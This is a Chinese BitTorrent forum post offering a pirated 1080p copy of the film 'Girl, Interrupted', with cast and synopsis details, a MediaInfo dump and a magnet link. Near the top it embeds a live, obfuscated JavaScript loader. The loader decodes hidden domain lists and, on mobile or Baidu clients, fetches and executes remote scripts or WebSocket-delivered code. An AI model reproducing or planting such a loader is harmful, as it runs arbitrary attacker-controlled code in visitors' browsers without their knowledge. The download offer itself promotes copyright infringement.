移魂女郎[中文字幕]Girl.Interrupted.1999.1080p.BluRay.DTS.x265-10bit-迅雷下载 11.85GB

版主小s 5天前 338

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译  名 移魂女郎 / 女生向前走(台) / 被禁锢的女孩 / 我有冇问题
◎片  名 Girl, Interrupted
◎年  代 1999
◎产  地 美国 / 德国
◎类  别 剧情 / 传记
◎语  言 英语
◎上映日期 1999-12-08(美国首映) / 2000-01-14(美国)
◎IMDb链接 https://www.imdb.com/title/tt0172493/
◎豆瓣评分 8.2/10 (32676人评价)
◎豆瓣链接 https://movie.douban.com/subject/1296185/
◎片  长 127 分钟
◎导  演 詹姆斯·曼高德 James Mangold (id:1036395)
◎编  剧 苏珊娜·凯森 Susanna Kaysen (id:1041767)
       詹姆斯·曼高德 James Mangold (id:1036395)
       丽莎·卢默 Lisa Loomer (id:1371342)
       安娜·汉密尔顿·费伦 Anna Hamilton Phelan (id:1285925)
◎演  员 薇诺娜·瑞德 Winona Ryder (id:1012519)
       安吉丽娜·朱莉 Angelina Jolie (id:1054447)
       克里·杜瓦尔 Clea DuVall (id:1027191)
       布莱特妮·墨菲 Brittany Murphy (id:1035650)
       伊丽莎白·莫斯 Elisabeth Moss (id:1022566)
       杰瑞德·莱托 Jared Leto (id:1013764)
       杰弗里·塔伯 Jeffrey Tambor (id:1010578)
       瓦妮莎·雷德格雷夫 Vanessa Redgrave (id:1004576)
       乌比·戈德堡 Whoopi Goldberg (id:1041120)
       安吉拉·贝蒂斯 Angela Bettis (id:1013924)
       吉利安·阿美娜特 Jillian Armenante (id:1058688)
       克莉丝汀·梅尔斯 Christina Myers (id:1371343)
       乔安娜·科恩斯 Joanna Kerns (id:1007067)
       米沙·克林斯 Misha Collins (id:1025178)
       柯特伍德·史密斯 Kurtwood Smith (id:1010600)
       亨利·亚历克斯·鲁宾 Henry Alex Rubin (id:1322367)
       道格拉斯·威克 Douglas Wick (id:1300860)
       Cathy Konrad Cathy Konrad (id:1288878)
       麦切尔·丹纳 Mychael Danna (id:1050402)
       凯文·坦特 Kevin Tent (id:1299062)
       Lisa Beach Lisa Beach (id:1278137)
       Maggie Martin Maggie Martin (id:1291127)
       Richard Hoover Richard Hoover (id:1286889)
       艾丽安·飞利浦 Arianne Phillips (id:1294449)
       米尔顿·布拉斯 Milton Buras (id:1279615)
       朱莉亚·L·沃克尔 Julia L. Walker (id:1300304)
       Carol Schwartz Carol Schwartz (id:1297008)
       珍妮·施雷耶 Janeen Schreyer (id:1296963)
       约翰·E·杰克森 John E. Jackson (id:1287483)
       Kathrine Gordon Kathrine Gordon (id:1285188)
       亨利·亚历克斯·鲁宾 Henry Alex Rubin (id:1322367)
       Cas Donovan Cas Donovan (id:1282586)
       Kristen Ploucha Kristen Ploucha (id:1294622)
       Gloria Barnhart Gloria Barnhart (id:1396186)

◎标  签 心理 / 美国 / 女性 / 青春 / 1999 / 剧情 / 成长 / 传记

◎简  介
  本片根据苏珊娜凯森的自传体小说改编而成。苏珊娜(薇诺娜·瑞德 Winona Ryder饰)本是正值花季的普通少女,却被诊断为“边缘精神错乱症”而送进了精神病院。虽然苏珊娜深陷现实世界的精神压力中饱受折磨,但在精神病院苏珊娜结识到了一群看似乖戾却不同寻常的新朋友。具有反社会人格的莉莎(安吉丽娜·朱莉 Angelina Jolie饰),带领患有说谎癖的乔治娜(克丽·杜瓦尔 Clea DuVall饰),对火深怀恐惧的珀丽(伊丽莎白·莫斯 Elisabeth Moss饰),不能当着他人面进食的戴西(布莱特妮·墨菲 Brittany Murphy饰)等其他女孩,做出了很多令人瞠目结舌的举动,这令医院管理人员头痛不已。苏珊娜逐渐融入了女孩们的“秘密活动”中。这一次次离经叛道的疯狂冒险,使她踏上了一场寻找自我的精神之旅。                                       
                                    安吉丽娜·朱莉因本片荣获第72届奥斯卡金像...

◎获奖情况 (共2项)
  第72届奥斯卡金像奖 (2000)
  最佳女配角
   └──安吉丽娜·朱莉 (id:1054447)

  第57届金球奖 (2000)
  电影类 最佳女配角
   └──安吉丽娜·朱莉 (id:1054447)

  1. General
  2. Unique ID                                : 25325569503670604356896096367170129508 (0x130D86FAF144870F346BDB1570418E64)
  3. Complete name                            : [email protected]OM.mkv
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 11.8 GiB
  7. Duration                                 : 2 h 7 min
  8. Overall bit rate mode                    : Variable
  9. Overall bit rate                         : 13.3 Mb/s
  10. Movie name                               : Girl Interrupted 1999 1080p BluRay DTS [email protected]
  11. Encoded date                             : UTC 2021-07-20 00:47:19
  12. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit
  13. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2
  14. Video
  15. ID                                       : 1
  16. Format                                   : HEVC
  17. Format/Info                              : High Efficiency Video Coding
  18. Format profile                           : Main [email protected]@High
  19. Codec ID                                 : V_MPEGH/ISO/HEVC
  20. Duration                                 : 2 h 7 min
  21. Bit rate                                 : 9 114 kb/s
  22. Width                                    : 1 920 pixels
  23. Height                                   : 1 040 pixels
  24. Display aspect ratio                     : 1.85:1
  25. Frame rate mode                          : Constant
  26. Frame rate                               : 23.976 (24000/1001/53354) FPS
  27. Color space                              : YUV
  28. Chroma subsampling                       : 4:2:0
  29. Bit depth                                : 10 bits
  30. Bits/(Pixel*Frame)                       : 0.190
  31. Stream size                              : 8.12 GiB (69%)
  32. Title                                    : [email protected]
  33. Writing library                          : x265 - H.265/HEVC codec
  34. Default                                  : Yes
  35. Forced                                   : No
  36. Audio
  37. ID                                       : 2
  38. Format                                   : DTS XLL
  39. Format/Info                              : Digital Theater Systems
  40. Commercial name                          : DTS-HD Master Audio
  41. Codec ID                                 : A_DTS
  42. Duration                                 : 2 h 7 min
  43. Bit rate mode                            : Variable
  44. Bit rate                                 : 4 169 kb/s
  45. Channel(s)                               : 6 channels
  46. Channel layout                           : C L R Ls Rs LFE
  47. Sampling rate                            : 48.0 kHz
  48. Frame rate                               : 93.750 FPS (512 SPF)
  49. Bit depth                                : 24 bits
  50. Compression mode                         : Lossless
  51. Stream size                              : 3.71 GiB (31%)
  52. Title                                    : English
  53. Language                                 : English
  54. Default                                  : Yes
  55. Forced                                   : No
  56. Text
  57. ID                                       : 3
  58. Format                                   : PGS
  59. Muxing mode                              : zlib
  60. Codec ID                                 : S_HDMV/PGS
  61. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  62. Duration                                 : 2 h 2 min
  63. Bit rate                                 : 23.8 kb/s
  64. Count of elements                        : 2613
  65. Stream size                              : 20.8 MiB (0%)
  66. Title                                    : CHS
  67. Language                                 : Chinese
  68. Default                                  : Yes
  69. Forced                                   : No


TAGS 剧情 传记

磁力链:
  • magnet:?xt=urn:btih:030949120A4CB2F6ADF8A04AC41FA675DC7A4AFE
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回